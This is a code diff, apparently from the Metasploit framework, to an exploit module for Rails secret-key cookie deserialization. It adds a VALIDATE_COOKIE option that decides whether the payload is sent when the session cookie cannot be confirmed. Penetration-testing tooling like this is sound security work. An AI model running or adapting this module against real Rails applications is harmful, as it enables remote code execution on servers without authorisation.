Allow user to choose to validate the cookie or not

modules/exploits/multi/http/rails_secret_deserialization.rb

@@ -136,6 +136,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				OptString.new('DIGEST_NAME', [ true, 'The digest type used to HMAC the session cookie','SHA1']),
 				OptString.new('SALTENC', [ true, 'The encrypted cookie salt', 'encrypted cookie']),
 				OptString.new('SALTSIG', [ true, 'The signed encrypted cookie salt', 'signed encrypted cookie']),
+				OptBool.new('VALIDATE_COOKIE', [ false, 'Only send the payload if the session cookie is validated', true]),
 
 			], self.class)
 	end
@@ -252,14 +253,19 @@ class Metasploit3 < Msf::Exploit::Remote
 				fail_with(Exploit::Failure::BadConfig, "SECRET does not match")
 			end
 		else
-			print_status("Caution: Cookie not found, maybe you need to adjust TARGETURI")
+			print_warning("Caution: Cookie not found, maybe you need to adjust TARGETURI")
 			if cookie_name.nil? || cookie_name.empty?
 				# This prevents trying to send busted cookies with no name
 				fail_with(Exploit::Failure::BadConfig, "No cookie found and no name given")
 			end
-			print_warning("Sending payload anyway! ;)")
+			if datastore['VALIDATE_COOKIE']
+				fail_with(Exploit::Failure::BadConfig, "COOKIE not validated, set VALIDATE_COOKIE to false send the payload without validation")
+			else
+				print_status("Trying to leverage default controller without cookie confirmation.")
+			end
 		end
 
+		print_status "Sending cookie #{cookie_name}"
 		res = send_request_cgi({
 			'uri'     => datastore['TARGETURI'] || "/",
 			'method'  => datastore['HTTP_METHOD'],